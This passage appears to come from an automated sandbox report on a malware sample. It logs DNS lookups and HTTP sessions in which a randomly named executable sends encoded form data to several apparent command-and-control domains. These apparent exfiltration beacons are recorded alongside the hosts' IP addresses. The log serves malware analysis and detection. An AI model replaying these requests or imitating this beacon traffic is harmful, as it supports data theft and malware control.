                          Jul 1, 2024 15:12:16.994961023 CEST5039753192.168.2.41.1.1.1
                          Jul 1, 2024 15:12:17.114538908 CEST53503971.1.1.1192.168.2.4
                          Jul 1, 2024 15:12:30.339020014 CEST4939153192.168.2.41.1.1.1
                          Jul 1, 2024 15:12:30.367228031 CEST53493911.1.1.1192.168.2.4
                          Jul 1, 2024 15:12:43.794682026 CEST5896753192.168.2.41.1.1.1
                          Jul 1, 2024 15:12:44.148720980 CEST53589671.1.1.1192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 1, 2024 15:11:42.830929995 CEST192.168.2.41.1.1.10xbb43Standard query (0)www.xxikcn20.icuA (IP address)IN (0x0001)false
                          Jul 1, 2024 15:11:47.853863001 CEST192.168.2.41.1.1.10xbb06Standard query (0)www.mareomnia.comA (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:03.557235956 CEST192.168.2.41.1.1.10x7dffStandard query (0)www.netgain360.onlineA (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:16.994961023 CEST192.168.2.41.1.1.10xfceaStandard query (0)www.hellokong.xyzA (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:30.339020014 CEST192.168.2.41.1.1.10xcef2Standard query (0)www.artvectorcraft.storeA (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:43.794682026 CEST192.168.2.41.1.1.10x2b19Standard query (0)www.eylmpwjot.storeA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 1, 2024 15:11:42.847588062 CEST1.1.1.1192.168.2.40xbb43Name error (3)www.xxikcn20.icunonenoneA (IP address)IN (0x0001)false
                          Jul 1, 2024 15:11:47.884944916 CEST1.1.1.1192.168.2.40xbb06No error (0)www.mareomnia.com81.4.100.198A (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:03.865873098 CEST1.1.1.1192.168.2.40x7dffNo error (0)www.netgain360.online66.96.162.130A (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:17.114538908 CEST1.1.1.1192.168.2.40xfceaNo error (0)www.hellokong.xyz203.161.49.220A (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:30.367228031 CEST1.1.1.1192.168.2.40xcef2No error (0)www.artvectorcraft.storeghs.google.comCNAME (Canonical name)IN (0x0001)false
                          Jul 1, 2024 15:12:30.367228031 CEST1.1.1.1192.168.2.40xcef2No error (0)ghs.google.com142.250.74.211A (IP address)IN (0x0001)false
                          Jul 1, 2024 15:12:44.148720980 CEST1.1.1.1192.168.2.40x2b19No error (0)www.eylmpwjot.store43.132.189.227A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • www.mareomnia.com
                          • www.netgain360.online
                          • www.hellokong.xyz
                          • www.artvectorcraft.store
                          • www.eylmpwjot.store

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44974481.4.100.198804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:11:47.898155928 CEST496OUTGET /ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.mareomnia.com
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:11:48.515640974 CEST874INHTTP/1.1 301 Moved Permanently
                          Date: Mon, 01 Jul 2024 13:11:48 GMT
                          Server: Apache/2.4.29 (Ubuntu)
                          X-Frame-Options: SAMEORIGIN
                          Location: https://www.mareomnia.com/ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&9Zed=oJfxPJMXK
                          Content-Length: 470
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 72 65 6f 6d 6e 69 61 2e 63 6f 6d 2f 79 61 37 34 2f 3f 64 42 4f 4c 38 66 67 3d 2b 61 62 59 64 7a 39 5a 59 6c 4c 45 62 5a 2f 52 38 52 4c 77 4c 72 57 2f 6b 70 69 4c 39 34 61 53 67 66 43 4e 2f 53 79 73 57 6a 4e 6d 34 65 78 61 6d 4e 49 67 46 4a 55 5a 31 53 34 67 72 42 45 39 6d 56 46 56 4a 5a 6a 70 2b 74 37 6e 34 74 79 6c 6d 6b 58 34 73 57 70 6b 65 35 66 42 2f 4f 50 33 37 6a 74 73 52 6d 35 65 2f 72 7a 30 44 63 45 4e 6c 39 35 76 64 39 6f 3d 26 [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mareomnia.com/ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&amp;9Zed=oJfxPJMXK">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.mareomnia.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.44974666.96.162.130804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:03.875196934 CEST776OUTPOST /7w6o/ HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.netgain360.online
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.netgain360.online/7w6o/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 46 79 4a 58 52 62 31 78 2b 66 49 34 63 38 66 6d 57 2b 79 47 6c 64 50 42 2b 4a 77 4e 65 44 38 63 63 42 68 42 6f 59 69 62 66 52 6b 59 50 76 67 74 47 45 41 4c 2f 77 4e 54 44 6a 4b 63 64 57 31 39 69 35 52 65 63 75 49 73 52 72 59 4e 5a 64 6c 73 36 38 41 4c 66 63 46 67 39 63 50 55 45 49 7a 79 54 49 42 59 68 74 43 30 4c 6f 51 43 43 43 77 78 4c 51 30 61 37 44 54 79 72 37 78 70 79 4a 6e 69 45 4d 73 79 32 69 72 65 41 32 64 32 48 58 67 74 6b 32 33 65 34 5a 6d 34 69 6f 6a 4b 79 70 78 69 69 42 72 67 30 76 66 72 4f 45 68 72 50 58 2b 55 43 71 30 2f 58 41 44 33 77 6a 33 67 79 58 68 33 42 41 3d 3d
                          Data Ascii: dBOL8fg=FyJXRb1x+fI4c8fmW+yGldPB+JwNeD8ccBhBoYibfRkYPvgtGEAL/wNTDjKcdW19i5RecuIsRrYNZdls68ALfcFg9cPUEIzyTIBYhtC0LoQCCCwxLQ0a7DTyr7xpyJniEMsy2ireA2d2HXgtk23e4Zm4iojKypxiiBrg0vfrOEhrPX+UCq0/XAD3wj3gyXh3BA==
                          Jul 1, 2024 15:12:04.359752893 CEST1087INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:04 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.44974766.96.162.130804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:06.407419920 CEST796OUTPOST /7w6o/ HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.netgain360.online
                          Content-Length: 224
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.netgain360.online/7w6o/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 46 79 4a 58 52 62 31 78 2b 66 49 34 61 64 50 6d 55 5a 47 47 30 74 50 47 7a 5a 77 4e 4c 7a 38 59 63 47 70 42 6f 63 37 57 66 69 41 59 4f 4c 6b 74 48 46 41 4c 36 77 4e 54 49 44 4b 5a 54 32 30 78 69 35 64 38 63 76 45 73 52 72 38 4e 5a 66 74 73 36 4c 63 49 65 4d 46 69 31 38 50 61 41 49 7a 79 54 49 42 59 68 75 2f 38 4c 6f 49 43 43 79 67 78 5a 68 30 5a 34 44 54 7a 38 4c 78 70 6b 35 6e 6d 45 4d 73 51 32 67 50 67 41 30 31 32 48 56 6f 74 6b 6b 66 64 6a 4a 6d 79 6f 49 69 49 36 71 4d 73 73 6a 43 7a 30 64 2f 62 49 46 31 4f 44 78 76 4f 54 62 56 6f 46 41 6e 45 74 6b 2b 55 2f 55 63 2b 61 41 36 71 66 44 6a 72 55 76 33 44 38 65 75 73 4a 62 39 39 75 33 6f 3d
                          Data Ascii: dBOL8fg=FyJXRb1x+fI4adPmUZGG0tPGzZwNLz8YcGpBoc7WfiAYOLktHFAL6wNTIDKZT20xi5d8cvEsRr8NZfts6LcIeMFi18PaAIzyTIBYhu/8LoICCygxZh0Z4DTz8Lxpk5nmEMsQ2gPgA012HVotkkfdjJmyoIiI6qMssjCz0d/bIF1ODxvOTbVoFAnEtk+U/Uc+aA6qfDjrUv3D8eusJb99u3o=
                          Jul 1, 2024 15:12:06.882215977 CEST1087INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:06 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.44974866.96.162.130804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:08.938555002 CEST10878OUTPOST /7w6o/ HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.netgain360.online
                          Content-Length: 10304
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.netgain360.online/7w6o/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 46 79 4a 58 52 62 31 78 2b 66 49 34 61 64 50 6d 55 5a 47 47 30 74 50 47 7a 5a 77 4e 4c 7a 38 59 63 47 70 42 6f 63 37 57 66 69 49 59 4f 2b 77 74 47 6d 34 4c 35 77 4e 54 4c 44 4b 59 54 32 30 34 69 34 31 34 63 76 34 57 52 70 30 4e 4c 71 68 73 38 2b 6f 49 56 4d 46 69 35 63 50 62 45 49 7a 64 54 49 52 6d 68 74 48 38 4c 6f 49 43 43 30 6b 78 62 77 30 5a 2b 44 54 79 72 37 78 75 79 4a 6d 42 45 4d 6b 68 32 67 4c 77 41 6b 56 32 43 46 59 74 6c 52 72 64 2b 5a 6d 38 76 49 69 71 36 71 41 6e 73 6a 65 2f 30 5a 33 69 49 46 42 4f 54 46 65 61 44 59 74 32 58 44 50 6e 79 46 53 45 36 6d 5a 6e 64 78 6a 57 56 32 2f 2f 4a 4f 66 73 6b 63 6a 67 4e 37 39 31 30 44 55 36 4e 68 2f 65 6e 6a 78 71 39 4b 2b 69 35 41 6e 5a 76 32 42 43 7a 55 4a 51 33 41 66 57 39 49 74 72 6e 73 57 43 4e 2b 61 6d 61 4e 42 31 50 43 43 36 4f 73 78 32 4b 51 72 72 41 47 55 44 68 63 69 62 46 55 59 38 69 31 54 61 4a 43 49 67 58 47 42 33 76 44 4d 70 6d 66 37 6a 4d 72 59 57 42 78 6e 33 52 67 69 42 75 68 4e 38 75 39 46 42 42 56 58 59 36 74 [TRUNCATED]
                          Data Ascii: dBOL8fg=FyJXRb1x+fI4adPmUZGG0tPGzZwNLz8YcGpBoc7WfiIYO+wtGm4L5wNTLDKYT204i414cv4WRp0NLqhs8+oIVMFi5cPbEIzdTIRmhtH8LoICC0kxbw0Z+DTyr7xuyJmBEMkh2gLwAkV2CFYtlRrd+Zm8vIiq6qAnsje/0Z3iIFBOTFeaDYt2XDPnyFSE6mZndxjWV2//JOfskcjgN7910DU6Nh/enjxq9K+i5AnZv2BCzUJQ3AfW9ItrnsWCN+amaNB1PCC6Osx2KQrrAGUDhcibFUY8i1TaJCIgXGB3vDMpmf7jMrYWBxn3RgiBuhN8u9FBBVXY6tjm76yXGDB5EVGEdQO2wJb9cgm91Ti92C7KoNHikP0oXGTXevs8nrpJLDbav0yI3x2qHbG+NtIjl4yJUxsOphEGY3ROwjNI0JndzzU6qrJasxTNYO0kj8xJKIID14ju6e/1XurDhpxHkyTdZaxXGUgjrQTCCzt/V/9RFZE4B9FAPem8YTbZ62aZc5Hqg0fWJR7ngipJtO8op/dpQ1Dp25NtUCA19YFzulv6heObU+LHBV3/CDpGq0EJCiw8rI/izxuwXD1ctBxTPMBYvg9WZphvEiA6WEtz2PANEAzqZFpZfNUGV/ZB1ehlgOQSQ8x+lwpyCxqhuVQrWtP6zs06VTplCzVUfPhNOE6RIxM6AfwVuuNGiS/foqvwG7Pf5dW0Wpm03w3hdQVvmNIzdGiHw9/p/gTf7hrNqny7p2JEPAZa8rf24xVg0ZtjpptrHuxt+8Y9tp1XInk7ZF0U65iegg073Ce5UOkvAJ39FNVmWZI9YOYEpGAU3WaRv9JvN7iLs7ynS6JahzRggOJPZiar3ip816EKIxTizYeBMKrH0Cy3Bjib/f2S1CEwwYIk5NPexJzm4lrGcVGUKK5oEGQRs5ZFR07d/9/VkXCIn9uAlr22260Ix1DPDh2B2gXqvbKySyNulWbTw6HEPQ6feeahjQZLm5n+GYxITgUN [TRUNCATED]
                          Jul 1, 2024 15:12:09.422924995 CEST1087INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:09 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.44974966.96.162.130804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:11.469964981 CEST500OUTGET /7w6o/?dBOL8fg=Iwh3SuFj0OMFYPToOdaCt8n09YMWVwcBCXZ5uIfRfjsROf0gJ1Ep/RQuBjSxRyYqk6VMa+wJUYkrYqg42OI1bOM95Oj9JPajS4UzxvnlYuQuHl4yeh0Z5Q8=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.netgain360.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:12:11.975930929 CEST1087INHTTP/1.1 404 Not Found
                          Date: Mon, 01 Jul 2024 13:12:11 GMT
                          Content-Type: text/html
                          Content-Length: 867
                          Connection: close
                          Server: Apache
                          Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                          Accept-Ranges: bytes
                          Age: 0
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.449750203.161.49.220804320C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          TimestampBytes transferredDirectionData
                          Jul 1, 2024 15:12:17.123480082 CEST764OUTPOST /ov93/ HTTP/1.1
                          Host: www.hellokong.xyz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-us
                          Origin: http://www.hellokong.xyz
                          Content-Length: 204
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Referer: http://www.hellokong.xyz/ov93/
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 64 42 4f 4c 38 66 67 3d 31 73 51 53 42 63 4b 42 63 75 45 56 66 5a 6e 71 4b 30 59 65 73 34 6b 75 6f 53 4a 7a 6b 41 72 4e 42 6a 6d 33 4d 66 38 31 52 63 71 7a 44 79 67 63 48 65 6f 7a 58 43 6a 75 51 35 51 51 6b 78 54 34 4c 74 4b 6a 66 61 30 31 39 62 67 68 47 51 52 67 72 49 35 51 6b 67 55 6f 45 75 78 78 46 30 4c 36 63 4f 39 73 33 59 37 6c 44 66 46 54 41 71 52 34 6b 2b 41 67 53 37 7a 6b 43 31 62 78 76 42 48 49 68 30 7a 34 42 58 2f 32 71 34 33 73 77 2f 44 31 46 35 79 44 39 51 31 36 79 37 78 48 53 6b 4b 30 57 4a 6b 78 58 4e 43 7a 56 69 44 71 52 4f 6a 32 30 65 55 33 50 42 4e 78 38 79 78 30 33 53 30 52 37 41 3d 3d
                          Data Ascii: dBOL8fg=1sQSBcKBcuEVfZnqK0Yes4kuoSJzkArNBjm3Mf81RcqzDygcHeozXCjuQ5QQkxT4LtKjfa019bghGQRgrI5QkgUoEuxxF0L6cO9s3Y7lDfFTAqR4k+AgS7zkC1bxvBHIh0z4BX/2q43sw/D1F5yD9Q16y7xHSkK0WJkxXNCzViDqROj20eU3PBNx8yx03S0R7A==
